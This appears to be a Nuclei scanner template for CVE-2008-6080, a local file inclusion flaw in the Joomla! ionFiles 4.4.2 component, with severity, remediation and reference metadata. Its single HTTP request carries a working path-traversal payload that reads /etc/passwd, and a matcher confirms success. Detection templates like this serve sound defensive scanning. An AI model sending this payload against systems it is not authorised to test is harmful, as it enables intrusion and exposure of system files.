42 lines
1.5 KiB
YAML
42 lines
1.5 KiB
YAML
id: CVE-2008-6080
|
|
|
|
info:
|
|
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: medium
|
|
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
|
remediation: |
|
|
Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/6809
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/46039
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2008-6080
|
|
cwe-id: CWE-22
|
|
epss-score: 0.00824
|
|
epss-percentile: 0.79974
|
|
cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: codecall
|
|
product: com_ionfiles
|
|
tags: edb,cve,cve2008,joomla,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a00463044022050ca3abd41b7a8790876bb71ef0029af7c1d3b0e0544f2abf58240f3000abf63022076b95e94ca23fbdfe25e9c2b47e3045597936f6fa0314d14a648ccdca2eb00da:922c64590222798bb761d5b6d8e72950 |